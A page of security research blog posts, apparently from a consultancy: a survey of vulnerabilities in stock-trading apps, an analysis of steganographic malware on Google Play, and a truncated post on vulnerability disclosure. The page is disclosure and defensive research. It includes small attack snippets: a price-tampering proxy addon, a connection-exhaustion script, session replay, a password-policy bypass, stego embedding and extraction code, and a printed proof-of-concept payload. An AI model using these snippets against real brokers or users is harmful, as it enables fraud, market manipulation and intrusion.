RESEARCH | August 7, 2018

Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies

This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details of the research.

Disclaimer

Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.

This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.

Introduction

The days of open outcry on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities is now easier and faster than ever, but this comes with inherent risks.


The valuable information in trading environments, as well as the attack surface and vectors, differs slightly from that in banking systems.

Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Send buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.

Scope

My analysis started in mid-2017 and concluded in July 2018. It encompassed the following platforms, many of which are among the most used and well-known trading platforms; some also allow cryptocurrency trading:

  • 16 Desktop applications
  • 34 Mobile apps
  • 30 Websites

These platforms are part of the trading solutions offered by the following brokers, which are used by tens of millions of traders. Some brokers offer all three types of platforms; however, in some cases only one or two were reviewed due to certain limitations:

  • Ally Financial
  • AvaTrade
  • Binance
  • Bitfinex
  • Bitso
  • Bittrex
  • Bloomberg
  • Capital One
  • Charles Schwab
  • Coinbase
  • easyMarkets
  • eSignal
  • ETNA
  • eToro
  • E-TRADE
  • ETX Capital
  • ExpertOption
  • Fidelity
  • Firstrade
  • FxPro
  • GBMhomebroker
  • Grupo BMV
  • IC Markets
  • Interactive Brokers
  • IQ Option
  • Kraken
  • Markets.com
  • Merrill Edge
  • MetaTrader
  • Net
  • NinjaTrader
  • OANDA
  • Personal Capital
  • Plus500
  • Poloniex
  • Robinhood
  • Scottrade
  • TD Ameritrade
  • TradeStation
  • Yahoo! Finance

Devices used:

  • Windows 7 (64-bit)
  • Windows 10 Home Single (64-bit)
  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • iOS 10.4 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

The review covered basic security controls and features, which represent just the tip of the iceberg compared to more exhaustive lists of security checks per platform.

Results

Unfortunately, the results proved to be much worse than those for retail banking applications. For example, mobile trading apps are less secure than the personal banking apps reviewed in 2013 and 2015.

Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.

While testing, I noted a basic correlation: the biggest brokers are the ones that invest the most in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.

Based on my testing results and opinion, the following trading platforms are the most secure:

Broker               Platforms
TD Ameritrade        Web and mobile
Charles Schwab       Web and mobile
Merrill Edge         Web and mobile
MetaTrader 4/5       Desktop and mobile
Yahoo! Finance       Web and mobile
Robinhood            Web and mobile
Bloomberg            Mobile
TradeStation         Mobile
Capital One          Mobile
FxPro cTrader        Desktop
IC Markets cTrader   Desktop
Ally Financial       Web
Personal Capital     Web
Bitfinex             Web and mobile
Coinbase             Web and mobile
Bitso                Web and mobile

The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, denial of service, authentication, and/or session management. Despite the fact that these platforms implement good security features, they also have areas that should be addressed to improve their security.

The following platforms, in my opinion, must improve in terms of security:

Broker                        Platforms
Interactive Brokers           Desktop, web, and mobile
IQ Option                     Desktop, web, and mobile
AvaTrade                      Desktop and mobile
E-TRADE                       Web and mobile
eSignal                       Desktop
TD Ameritrade's Thinkorswim   Desktop
Charles Schwab                Desktop
TradeStation                  Desktop
NinjaTrader                   Desktop
Fidelity                      Web
Firstrade                     Web
Plus500                       Web
Markets.com                   Mobile

Unencrypted Communications

Unencrypted data transmission was observed in 9 desktop applications (64%) and in 2 mobile apps (6%). Most applications encrypt most of the sensitive data they transmit; however, there were some cases where cleartext data could be seen in unencrypted requests.

Among the data seen unencrypted are passwords, balances, portfolios, personal information, and other trading-related data. In most cases of unencrypted transmission, plaintext HTTP was seen; in others, old proprietary protocols or other financial protocols, such as FIX, were used.

Under certain circumstances, an attacker with access to some part of the network, such as the router of a public WiFi network, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
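
To make this concrete, here is a minimal sketch of such tampering written as a mitmproxy addon; the endpoint path and the JSON field name are invented for illustration and are not taken from any of the tested platforms:

    # price_tamper.py - hypothetical mitmproxy addon that inflates the "ask"
    # price in cleartext HTTP quote responses (run: mitmdump -s price_tamper.py)
    import json
    from mitmproxy import http

    def response(flow: http.HTTPFlow) -> None:
        # Only touch the assumed quote endpoint of a hypothetical broker API
        if flow.request.scheme == "http" and "/api/quote" in flow.request.path:
            try:
                quote = json.loads(flow.response.get_text())
            except ValueError:
                return
            if "ask" in quote:
                quote["ask"] = round(quote["ask"] * 1.05, 2)  # misleading price
                flow.response.set_text(json.dumps(quote))

Because the channel is unencrypted, nothing on the client side can detect that the quote was altered in transit.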

For example, the following application uses unencrypted HTTP. In the screenshot, a buy order:

Another interesting example was found in eSignal's Data Manager. eSignal is a well-known signal provider that integrates with a wide variety of trading platforms and acts as a source of market data. During testing, it was noted that the Data Manager authenticates over an unencrypted protocol on TCP port 2189, apparently developed in 1999.

As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.

The main eSignal login screen also authenticates through a cleartext channel:

FIX is a protocol introduced in 1992 and is one of the industry-standard protocols for messaging and trade execution. Currently, it is used by the majority of exchanges and traders. There are guidelines on how to implement it over a secure channel; however, the binary version was mostly seen in cleartext. Tests against the protocol itself were not performed in this analysis.

A broker that supports FIX:

There are some cases where the application encrypts the communication channel, except in certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all the communication, but not that used by iBot, the robot assistant that receives text or voice commands, which sends the instructions to the server embedded in a FIX protocol message in cleartext:

News related to the positions was also observed in plaintext:

Another instance of an application that uses encryption but not for certain channels is Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server on a scheduled basis through unencrypted HTTP:

A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.

Others appear to implement their own binary protocols, such as Charles Schwab; however, symbols in watchlists or quoted symbols could be seen in cleartext:

Interactive Brokers supports encryption but uses an insecure channel by default; an inexperienced user who does not know the meaning of "SSL" (Secure Sockets Layer) won't enable it on the login screen, and some sensitive data will be sent and received without encryption:

Passwords Stored Unencrypted

In 7 mobile apps (21%) and in 3 desktop applications (21%), the user's password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract it, though; this access could be either physical or through malware.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it's relatively easy), log in through the broker's web-based trading platform, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (more than 75%) support two-factor authentication (2FA); however, it's not enabled by default. The user must go to the configuration and enable it to receive authorization codes by text message or email. Hence, if 2FA is not enabled on the account, it's possible for an attacker who already knows the password to link a new bank account and withdraw the money from sold securities.

The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:

Base64 is not encryption:
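
As a minimal illustration (the stored value below is invented), recovering the original password from a Base64 string requires no key at all:

    # Base64 is a reversible encoding, not encryption: no key is involved
    import base64

    stored = "UzNjcjN0UGFzc3dvcmQh"  # hypothetical value found in a config file
    print(base64.b64decode(stored).decode())  # prints: S3cr3tPassword!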

In some cases, the password was sent to the server as a GET parameter, which is also insecure:

A single PIN used both for login and for unlocking the app was also seen:

In IQ Option, the password was stored completely unencrypted:

However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:

Trading and Account Information Stored Unencrypted

In the trading context, operational or strategic data must not be stored unencrypted nor sent to any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as usernames, passwords, session IDs, URLs, and cryptographic tokens should not be exposed either.

8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though; this access could be either physical or through malware.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

The following screenshots show applications that store sensitive data unencrypted:

Balances:

Investment portfolio:

Buy/sell orders:

Watchlists:

Recently quoted symbols:

Other data:

Trading Programming Languages with DLL Import Capabilities

This is not a bug; it's a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages such as C++, C#, or Pascal.

The following are a few of the trading platforms with their own trading language:

  • MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
  • NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
  • TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
  • AvaTradeAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
  • (FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)

Nevertheless, some platforms, such as MetaTrader, warn their customers about the dangers of DLL imports and advise them to execute plugins only from trusted sources. However, there are Internet tutorials claiming to "make you rich overnight" with certain trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox that allows DLL imports. Innocent, non-tech-savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.

The following is a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:

Another basic example is NinjaTrader, which simply allows OS commands through C#'s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe is executed from the chart initialization routine:
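
For readers unfamiliar with the implications, here is a rough Python stand-in for that proof of concept (the original is NinjaScript/C#): any plugin language that exposes process creation turns "load this indicator" into "run arbitrary commands":

    # Benign stand-in for the NinjaScript PoC: a plugin callback that spawns
    # an OS process (here the Windows calculator) when the chart initializes
    import subprocess

    def on_chart_init():
        subprocess.Popen(["calc.exe"])  # a malicious plugin could run anything

    on_chart_init()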

Denial of Service

Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connection handling of such services.

A common error is not limiting the number of concurrent connections. If a TCP daemon has no limit on concurrent connections, applications are susceptible to denial-of-service (DoS) or other types of attacks, depending on the nature of the application.

For example, TD Ameritrade's Thinkorswim TCP-Orders Server listens on TCP port 2000 on the localhost interface, and there is no limit on connections nor a waiting time between orders. This leads to the following problems:

  • Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
  • Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
  • A NULL pointer dereference is triggered and an error report (.zip file) is created.

It listens on the local interface only; regardless, there are different ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.

Memory leakage could be easily triggered by creating as many connections as possible:
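
A minimal sketch of such a test against a local order server like the one described above (port 2000 on localhost; run it only against your own installation):

    # Keep opening connections without ever closing them to observe whether
    # the server frees per-connection resources
    import socket

    conns = []
    try:
        while True:
            conns.append(socket.create_connection(("127.0.0.1", 2000)))
            if len(conns) % 100 == 0:
                print(f"{len(conns)} connections open")
    except OSError as exc:
        print(f"stopped after {len(conns)} connections: {exc}")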

A similar DoS vulnerability due to memory exhaustion was found in eSignal's Data Manager. As noted earlier, eSignal acts as a source of market data for a wide variety of trading platforms; therefore, availability is its most important asset:

It's recommended to implement a configuration item that allows the user to control the behavior of the TCP order server, such as the maximum number of orders sent per minute and the number of seconds to wait between orders, to avoid bottlenecks.

The following capture from Interactive Brokers shows this countermeasure implemented properly. No more than 51 users can be connected simultaneously:

Session Still Valid After Logout

Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.

In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:
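
A simple way to test for this behavior, sketched below with an invented endpoint and cookie name: capture the session cookie, log out, wait an hour, and replay an authenticated request. Account data instead of a login redirect means the token is still alive:

    # Replay a pre-logout session cookie to check server-side termination
    import time
    import requests

    cookies = {"SESSIONID": "value-captured-before-logout"}  # placeholder
    time.sleep(3600)  # one hour after clicking the logout button

    r = requests.get("https://broker.example.com/account/balances",
                     cookies=cookies, allow_redirects=False)
    # 200 with account data => session still valid; 302 to login => terminated
    print(r.status_code)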

Authentication

While most web-based trading platforms support 2FA (more than 75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.

Nowadays, most modern smartphones support fingerprint reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

Weak Password Policies

Some institutions let the users choose easily guessable passwords. For example:

The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.

In some cases, such as IQ Option and Markets.com, the password policy validation is implemented on the client side only; hence, it is possible to intercept a request and send a weak password to the server:
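
A sketch of that bypass with an invented registration endpoint; the weak password goes straight to the server, skipping the JavaScript checks entirely:

    # Client-side password policies are advisory: POST a weak password
    # directly and see whether the server accepts it
    import requests

    r = requests.post("https://broker.example.com/api/register",
                      json={"email": "test@example.com", "password": "123456"})
    print(r.status_code)  # a 2xx response means the policy lives only in the browser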

Automatic Logout/Lockout for Idle Sessions

Most web-based platforms log out or lock out the user automatically, but this is not the case for desktop applications (43%) and mobile apps (25%). This security control forces the user to authenticate again after a period of idle time.

Privacy Mode

This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.

The following images show before and after enabling privacy mode in Thinkorswim for mobile:

Hardcoded Secrets in Code and App Obfuscation

16 Android .apk installers (47%) were easily reverse engineered into human-readable code since they lack obfuscation. Most Java- and .NET-based desktop applications were also reverse engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge, shown in the next screenshot.

The goal of obfuscation is to conceal an application's purpose and logic (security through obscurity) in order to deter reverse engineering and make it more difficult.

In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:

Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) contain traces (hostnames and IPs) of the internal development and testing environments where they were built or tested. Some hostnames are reachable from the Internet, and since they're testing systems, they could lack proper protections.

SSL Certificate Validation

11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it's feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on their phone, though.
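
For reference, getting this right is mostly a matter of not disabling the defaults. The sketch below (the hostname is a placeholder) shows a client that aborts when the certificate chain or hostname does not check out, which is exactly what a MiTM with a forged certificate triggers:

    # A TLS client that actually validates the server certificate
    import socket
    import ssl

    ctx = ssl.create_default_context()  # CERT_REQUIRED + hostname checking

    with socket.create_connection(("broker.example.com", 443)) as sock:
        # wrap_socket raises ssl.SSLCertVerificationError on a bad certificate
        with ctx.wrap_socket(sock, server_hostname="broker.example.com") as tls:
            print(tls.version())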

The apps that do verify the certificate normally refuse to transmit any data when validation fails; however, only Charles Schwab allows the user to continue using the app with the certificate provided:

Lack of Anti-exploitation Mitigations

ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack canaries are used to identify when the stack has been corrupted. These security features make it much more difficult for memory corruption bugs to be exploited to execute arbitrary code.

The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, these features are enabled only in some components, not the entire application. In other cases, components that handle network connections also lack these flags.

Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.
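
One way to check a Windows binary for the ASLR and DEP flags, sketched with the pefile library (the path is a placeholder):

    # Inspect a PE header's DllCharacteristics bits: a missing bit means the
    # corresponding mitigation is disabled for that binary
    import pefile

    DYNAMIC_BASE = 0x0040  # ASLR
    NX_COMPAT    = 0x0100  # DEP

    pe = pefile.PE(r"C:\TradingApp\trading.exe")
    flags = pe.OPTIONAL_HEADER.DllCharacteristics
    print("ASLR:", bool(flags & DYNAMIC_BASE))
    print("DEP: ", bool(flags & NX_COMPAT))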

Other Weaknesses

More issues were found in the platforms. For more details, please refer to the white paper. 

Statistics

Since a picture is worth a thousand words, consider the following graphs:

For more statistics, please refer to the white paper.

Responsible Disclosure

One of IOActive's missions is to act responsibly when it comes to vulnerability disclosure. In September 2017, we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher-risk vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.

As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.

TD Ameritrade and Charles Schwab were the brokers that communicated the most with IOActive in resolving the reported issues.

For a table with the current status of the responsible disclosure process, please refer to the white paper.

Conclusions and Recommendations

  • Trading platforms are less secure than the applications seen in retail banking.
  • There’s still a long way to go to improve the maturity level of security in trading technologies.
  • End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
  • Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
  • Brokerage firms should also offer security guidance in their online education centers.
  • Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Rating organizations should include security in their reviews.

Side Note

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

Thanks for reading,

Alejandro
@nitr0usmx

This blog post contains a small portion of the entire analysis.
Please refer to the white paper.

RESEARCH | September 22, 2015

Is Stegomalware in Google Play a Real Threat?

For several decades, the science of steganography has been used to hide malicious code (useful in intrusions) or to create covert channels (useful in information leakage). Nowadays, steganography can be applied to almost any logical or physical medium (file formats, images, audio, video, text, protocols, programming languages, file systems, BIOS, etc.). If the steganographic algorithms are well designed, the hidden information is really difficult to detect. Detecting hidden information, malicious or not, is so complex that the study of steganalytic algorithms (detection) has been growing. You can see the growth in scientific publications (source: Google Scholar) and research investment by governments and institutions.
In fact, since the attacks on September 11, 2001, there has been a lot of discussion about the possibility of terrorists using this technology.
In this post, I would like to illustrate steganography’s ability to hide data in Android applications. In this experiment, I focus on Android applications published in Google Play, leaving aside alternative markets with lower security measures, where it is easier to introduce malicious code.
 
 
Is it possible to hide information on Google Play or in the Android apps released in it?
 
The answer is easy: YES! Simple techniques have been documented, from hiding malware by renaming the file extension (Android/tr DroidCoupon.A – 2011, Android/tr SmsZombie.A – 2012, Android/tr Gamex.A – 2013) to more sophisticated procedures (AngeCryption – Black Hat Europe, October 2014).
 
Let me show some examples in more depth:
 
 
Google Play Web (https://play.google.com)
 
Google Play includes a webpage for each app with information such as a title, images, and a text description. Each piece of information could conceal data using steganography (linguistic steganography, image steganography, etc.). In fact, I am going to “work” with digital images and demonstrate how Google “works” when there is hidden information inside of files.
 
To do this, I will use two known steganographic techniques: adding information to the end of file (EOF) and hiding information in the least significant bit (LSB) of each pixel of the image.
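
A rough sketch of both techniques in Python (Pillow for the LSB variant; filenames are placeholders):

    # Two classic tricks: append data after the PNG IEND chunk (EOF) and
    # hide bits in the least significant bit of each pixel (LSB)
    from PIL import Image

    # EOF: PNG parsers stop at the IEND chunk, so appended bytes go unnoticed
    with open("cover.png", "ab") as f:
        f.write(b"hidden message after IEND")

    # LSB: embed the bits of a short secret into the red channel
    img = Image.open("cover.png").convert("RGB")
    pixels = img.load()
    bits = "".join(f"{byte:08b}" for byte in b"secret")
    for i, bit in enumerate(bits):
        x, y = i % img.width, i // img.width
        r, g, b = pixels[x, y]
        pixels[x, y] = ((r & ~1) | int(bit), g, b)  # overwrite the red LSB
    img.save("stego.png")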
      
 
PNG Images
 
You can upload PNG images to play.google.com that hide information using EOF or LSB techniques. Google does not remove this information.
 
For example, I created a sample app (automatically generated – https://play.google.com/store/apps/details?id=com.wMyfirstbaskeballgame) and uploaded several images (which you can see on the web) with hidden messages. In one case, I used the OpenStego steganographic tool (http://www.openstego.com/) and in another, I added the information at the end of an image with a hex editor.
 
The results can be seen by performing the following steps (analyzing the current images “released” on the website):
Example 1: PNG with EOF
 
 
Step 2: Look at the end of the file 🙂
Example 2: PNG with LSB
 
 
Step 2: Recover the hidden information using OpenStego (key=alfonso)
 
JPEG Images
If you try to upload a steganographic JPEG image (EOF or LSB) to Google Play, the hidden information will be removed. Google reprocesses the image before publishing it. This does not necessarily mean that it is not possible to hide information in this format. In fact, in social networks such as Facebook, we can “avoid” a similar problem with Secret Book or similar browser extensions. I’m working on it…
 
https://chrome.google.com/webstore/detail/secretbook/plglafijddgpenmohgiemalpcfgjjbph?hl=en-GB
 
In summary, based on the previous proofs of concept, I can say that Google Play allows information to be hidden in the images of each app. Is this useful? It could be used to exchange hidden information (a covert channel using Google Play). The main question is whether an attacker could use the masked information for some evil purpose. Perhaps they could use images to encode executable code that "exploits" when you visit the web page (using, for example, polyglots plus stego exploits), or another idea. Time will tell…
 
 
 
APK Steganography
 
Applications uploaded to Google Play are not modified by the market. That is, an attacker can use any of the existing resources in an APK to hide information, and Google does not remove that information. For example, machine code (DEX), PNG, JPEG, XML, and so on.
 
 
Could it be useful to hide information on those resources?
 
An attacker might want to conceal malicious code in these resources and hinder automatic detection (static and dynamic analysis) that focuses on the code (DEX). A simple example would be an application that hides a specific phone number in an image (APT?).
 
The app verifies the phone number, and after a few clicks in a specific screen on a mobile phone, checks if the number is equal to that stored in the picture. If the numbers match, you can start leaking information (depending on the permissions allowed in the application).
 
I want to demonstrate the potential of Android stegomalware with a PoC. Instead of developing one, I will analyze an active sample that has been on Google Play since June 9, 2014. This stegomalware was developed by researchers at Universidad Carlos III de Madrid, Spain (http://www.uc3m.es). The PoC hides a DEX file (executable code) in an image (resource) of the main app. When the app is running and the user performs a series of actions, the "new" DEX file is recovered from the image. This code runs and connects to a URL with a payload (in this case harmless). The "bad" behavior of this application can only be detected if we analyze the app's resources in detail or simulate the interaction the app uses to trigger the connection to the URL.
 
Let me show how this app works (static manual analysis):
Step 1. Download the APK to our local store. This requires a tool, such as an APK downloader extension or a specific website such as http://apps.evozi.com/apk-downloader/
Step 2. Unzip the APK (es.uc3m.cosec.likeimage.apk)
Step 3. Using the Stegdetect steganalytic tool (https://github.com/abeluck/stegdetect) we can detect hidden information in the image “likeimage.jpg”. The author used the F5 steganographic tool (https://code.google.com/p/f5-steganography/).
 
es.uc3m.cosec.likeimage/res/drawable-hdpi/likeimage.jpg
likeimage.jpg : f5(***)
Step 4. To analyze (reverse engineer) what the app is doing with this image, I use the dex2jar and jd tools.
Step 5. Analyzing the code, we can observe the key used to hide information in the image. We can recover the hidden content to a file (bicho.dex).
java -jar f5.jar x -p cosec -e bicho.dex likeimage.jpg
 
Step 6. Analyzing the new file (bicho.dex), we can observe the connection to http://cosec-uc3m.appspot.com/likeimage for downloading a payload.
 
Step 7. Analyzing the code and payload, we can demonstrate that it is harmless.
ZGV4CjAzNQDyUt1DKdvkkcxqN4zxwc7ERfT4LxRA695kAgAAcAAAAHhWNBIAAAAAAAAAANwBAAAKAAAAcAAAAAQAAACYAAAAAgAAAKgAAAAAAAAAAAAAAAMAAADAAAAAAQAAANgAAABsAQAA+AAAACgBAAAwAQAAMwEAAD0BAABRAQAAZQEAAKUBAACyAQAAtQEAALsBAAACAAAAAwAAAAQAAAAHAAAAAQAAAAIAAAAAAAAABwAAAAMAAAAAAAAAAAABAAAAAAAAAAAACAAAAAEAAQAAAAAAAAAAAAEAAAABAAAAAAAAAAYAAAAAAAAAywEAAAAAAAABAAEAAQAAAMEBAAAEAAAAcBACAAAADgACAAEAAAAAAMYBAAADAAAAGgAFABEAAAAGPGluaXQ+AAFMAAhMTUNsYXNzOwASTGphdmEvbGFuZy9PYmplY3Q7ABJMamF2YS9sYW5nL1N0cmluZzsAPk1BTElDSU9VUyBQQVlMT0FEIEZST00gVEhFIE5FVDogVGhpcyBpcyBhIHByb29mIG9mIGNvbmNlcHQuLi4gAAtNQ2xhc3MuamF2YQABVgAEZ2V0UAAEdGhpcwACAAcOAAQABw4AAAABAQCBgAT4AQEBkAIAAAALAAAAAAAAAAEAAAAAAAAAAQAAAAoAAABwAAAAAgAAAAQAAACYAAAAAwAAAAIAAACoAAAABQAAAAMAAADAAAAABgAAAAEAAADYAAAAASAAAAIAAAD4AAAAAiAAAAoAAAAoAQAAAyAAAAIAAADBAQAAACAAAAEAAADLAQAAABAAAAEAAADcAQAA
 
The code that runs the payload:
 
Is Google detecting these “stegomalware”?
 
Well, I don’t have the answer. Clearly, steganalysis science has its limitations, but there are other ways to monitor strange behaviors in each app. Does Google do it? It is difficult to know, especially if we focus on “mutant” applications. Mutant applications are applications whose behavior could easily change. Detection would require continuous monitoring by the market. For example, for a few months I have analyzed a special application, including its different versions and the modifications that have been published, to observe if Google does anything with it. I will show the details:
Step 1. The mutant app is “Holy Quran video and MP3” (tr.com.holy.quran.free.apk). Currently at https://play.google.com/store/apps/details?id=tr.com.holy.quran.free

Step 2. Analyzing the current and previous versions of this app, I discovered connections to specific URLs (image files). Are these truly images? Not all of them.

Step 3. Two URLs that the app connects to are very interesting. In fact, they aren’t images but SQLite databases (with messages in Turkish). This is the trivial steganography technique of simply renaming the file extension. The author changed the content of these files:
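
Spotting this renaming trick is easy if you compare a file's magic bytes with what its extension claims (the filename is a placeholder):

    # A ".png" that is really a SQLite database betrays itself in its header
    MAGIC = {
        b"\x89PNG\r\n\x1a\n": "PNG",
        b"\xff\xd8\xff": "JPEG",
        b"SQLite format 3\x00": "SQLite database",
    }

    with open("io.png", "rb") as f:
        header = f.read(16)

    kind = next((name for magic, name in MAGIC.items()
                 if header.startswith(magic)), "unknown")
    print("declared: PNG, actual:", kind)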

Step 4. If we analyze these databases, it is possible to find curious messages. For example, recipes involving drugs.

Is Google aware of the information exchanged through these applications? This example is little more than a curiosity, but such procedures might violate the market's publication policies for certain applications, or something more serious.
 
Figure: Recipes inside the file io.png (SQLite database)

In summary, this small experiment shows that we can hide information on Google Play and Android apps in general. This feature can be used to conceal data or implement specific actions, malicious or not. Only the imagination of an attacker will determine how this feature will be used…


Disclaimer: part of this research is based on previous research by the author at ElevenPaths.
INSIGHTS | May 11, 2015

Vulnerability disclosure: the good and the ugly

I can’t believe I continue to write about disclosure problems. More than a decade ago, I started disclosing vulnerabilities to vendors and working with them to develop fixes. Since then, I have reported hundreds of vulnerabilities. I often think I have seen everything, and yet, I continue to be surprised over and over again. I wrote a related blog post a year and a half ago (Vulnerability bureaucracy: Unchanged after 12 years), and I will continue to write about disclosure problems until it’s no longer needed.

 

Everything is becoming digital. Vendors are producing software for the first time or with very little experience, and many have no security knowledge. As a result, insecure software is being deployed worldwide. The Internet of Things (IoT), industrial devices and industrial systems (SCADA/ICS), Smart City technology, automobile systems, and so on are insecure and getting worse instead of better.

 

Besides lacking security knowledge, many vendors do not know how to deal with vulnerability reports. They don't know what to do when an individual researcher or company privately discloses a vulnerability to them, how to properly communicate the problem, or how to fix it. Many vendors haven't planned for security patches. Basically, they never considered the possibility of a latent security flaw. This creates many of the problems the research community commonly faces.

 

When IOActive recently disclosed vulnerabilities in CyberLock products, we faced problems, including threats from CyberLock’s lawyers related to the Digital Millennium Copyright Act (DMCA). CyberLock’s response is a very good example of a vendor that does not know how to properly deal with vulnerability reports.

 

On the other hand, we had a completely different experience when we recently reported vulnerabilities to Lenovo. Lenovo’s response was very professional and collaborative. They even publicly acknowledged our collaboration:

 

“Lenovo’s development and security teams worked directly with IOActive regarding their System Update vulnerability findings, and we value their expertise in identifying and responsibly reporting them.”

Source: http://www.absolutegeeks.com/2015/05/06/round-2-lenovo-is-back-in-the-news-for-a-new-security-risk-in-their-computers (no longer active)

IOActive approached both cases in the same way, but with two completely different reactions and results.

 

We always try to contact the affected vendor through a variety of channels and offer our collaboration to ensure a fix is in place before we disclose our research to the public. We invest a lot of time and resources in helping vendors understand the vulnerabilities we find. We have calls with developers and managers, test their fixes, and so on, all for free and without expecting anything in return. We do not propose or discuss business opportunities; our only motive is to see that the vulnerabilities get fixed. We have a great track record; we've reported dozens of vulnerabilities and collaborated with many vendors and CERTs too.

 

When a vendor is nonresponsive, we feel that the best solution is usually to disclose the vulnerability to the public. We do this as a last resort, as no vendor patch or solution will be available in such a case. We do not want to be complicit in hiding a flaw. Letting people know can force the vendor to address the vulnerability.

Dealing with vulnerability reports shouldn’t be this difficult. I’m going to give some advice, based on my experience, to help companies avoid vulnerability disclosure problems and improve the security of their products:

 

  • Clearly display a contact email for vulnerability reports on the company/product website
  • Continuously monitor that email address and instantly acknowledge when you get a vulnerability report
  • Agree on response procedures including regular timeframes for updating status information after receiving the report
